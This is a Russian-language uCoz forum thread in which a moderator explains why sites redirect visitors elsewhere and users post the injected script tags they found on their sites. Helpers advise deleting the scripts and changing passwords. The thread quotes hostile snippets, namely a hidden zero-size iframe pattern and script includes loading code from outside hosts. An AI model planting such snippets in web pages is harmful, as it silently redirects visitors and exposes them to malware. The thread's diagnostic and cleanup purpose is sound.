Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой
При заходе на сайт перекидывает на другой
Модератор форума
Сообщение # 1 | 22:42:16
Описание проблемы:

При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом


Причины возникновения:

1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки
Если вы ставите к себе на сайт скрипт подобного вида
Code
<script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script>

где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные
Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность

2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе
Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой
Code
<iframe src="http://levyisite.ru" width="1" height="1"></iframe>

Где levyisite.ru - это адрес чужого сайта
а
Code
width="1" height="1"
может иметь значения 0
Code
width="0" height="0"
что означает фоновую (скрытую)подгрузку, то это на 100% агрессивный вредоносный код
Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов

3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность

4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес


Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем
Rоман
Сообщений: 3
Репутация: 0

Сообщение # 511 | 12:00:47
Спасибо за помощь, извините за некорректное обращение
pirog
Сообщений: 14
Репутация: 17

Сообщение # 512 | 04:57:09
Здравствуйте.

Сайт http://design-odessa.at.ua
Проблема: при переходе на него с поисковика перебрасывает на какую-то группу Вконтакте.

Выявил скрипт:
Код
<script language="javascript" src="[url=http://english-odessa.at.ua/js.php?s=54]./js.php?s=54"></script><script language="javascript" src="[url=http://golink1.ru9.biz/js/back.php?id=43]http://golink1.ru9.biz/js/back.php?id=43"></script>

Он, по видимому, является причиной переадресации, которая, кстати, срабатывает не каждый раз подряд, а настроена наверно на временные рамки.
Также выяснил наличие этого скрипта и этой же проблемы еще на нескольких заброшенных сайтах в своём аккаунте.

Понятно, что необходимо менять пароль, но, обращаюсь к знающим, правильно ли я поступлю удалив приведенный выше код скрипта?
Спасибо
Сообщение отредактировал pirog - Пятница, 08 Ноя 2013, 05:37:48
сondor
Сообщений: 4661
Репутация: 1528

Сообщение # 513 | 10:18:43
Цитата pirog ()
Понятно, что необходимо менять пароль, но, обращаюсь к знающим, правильно ли я поступлю удалив приведенный выше код скрипта?


pirog, конечно, удаляйте все неизвестные вам скрипты, назначение которых вы не знаете и которые подгружаются с других сайтов:

Цитата
<script language="javascript" src="./js.php?s=54"></script>
<script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>
<script charset="UTF-8" type="text/javascript" src="http://t1.teaser-goods.ru/ldr.js"></script>
<script language="JavaScript" src="http://gocash.ws/js/slider.php?id=51"></script>
pirog
Сообщений: 14
Репутация: 17

Сообщение # 514 | 11:51:56
condor-bird, спасибо

Просто не особо силен в коде и не знал какая реклама Юкозовская, а какая потусторонними силами была занесена. Ведь, если Юкозовскую затру, то забанят.
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 515 | 12:07:29
pirog, не забудьте сменить пароль uID-аккаунта. Судя по всему он уже скомпрометирован.
pirog
Сообщений: 14
Репутация: 17

Сообщение # 516 | 12:26:35
uid-пароль сменил, есть ли необходимость менять вебтоп-пароль?
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 517 | 13:02:32
pirog, есть необходимость это проделывать с периодичностью. О безопасности ТУТ
pirog
Сообщений: 14
Репутация: 17

Сообщение # 518 | 14:20:54
еще вопрос, этот код точно паразит?
Код
<script language="javascript" src="./js.php?s=54"></script>
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 519 | 14:57:12
pirog, это не системный код. Удаляйте не сомневаясь, он вам не нужен.
pirog
Сообщений: 14
Репутация: 17

Сообщение # 520 | 16:34:18
Всем спасибо, вроде подчистился, буду ждать результат)
demon1153
Сообщений: 9
Репутация: 0

Сообщение # 521 | 13:02:57
MOYDOM9402, Так у Вас Joomla, а тут решают проблемы Ucoza... По вашей CMS есть специальный форум поддержки, напишите туда, уверен решат оперативно
dimaser00
Сообщений: 4
Репутация: 0

Сообщение # 522 | 07:58:39
Мой сайт - http://serverb-wowm.at.ua/

Перекидывает на http://ww62.js.westernwlves.com/ . За гостя и админа одно и тоже.

Помогите пожалуйста!

Добавлено (22 Ноя 2013, 07:58:39)
---------------------------------------------
ааа ураа нашел сам . Спасибо

вот код



Код
<script type="text/javascript" src="http://westernwlves.com//markitup/jquery.markitup.js?20120707"></script>  
<script type="text/javascript" src="http://westernwoves.com//markitup/sets/bbcode/set.js?20120707"></script>
Валерий_СЕВЕРИН
Сообщений: 10
Репутация: 0

Сообщение # 523 | 21:06:31
Здравствуйте, вижу много таких проблем как у меня, но! Сказать что меня "как бы" перекидывает на чужой не могу т. к. Касперский просто блокирует сайт не мой, а др. Дело в том что закинул я свой сайт, потом через год восстановил (P. S. не знаю чё он не удалился). Несколько раз Касперский блокировал при открытии моего сайта какие-то ссылки, я не придал этому значению, но это уже не первый раз, поэтому насторожился. Несколько скриптов добавлял, проверял вроде в ручную, нигде этого сайта, который блокирует Касперский нет, проверял Web Мастером Яндекса, Онлайн DR. Web вирусов не обнаружено, но Касперский блокирут какой-то сайт, не хочется своих посетителей кидать непонятно куда. Помогите.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 524 | 21:08:36
Валерий_СЕВЕРИН, нужна ссылка на сайт. сайт должен быть открыт для гостей

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Валерий_СЕВЕРИН
Сообщений: 10
Репутация: 0

Сообщение # 525 | 21:09:20
Цитата webanet ()
нужна ссылка на сайт. сайт должен быть открыт для гостей
На мой сайт?
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой
Поиск: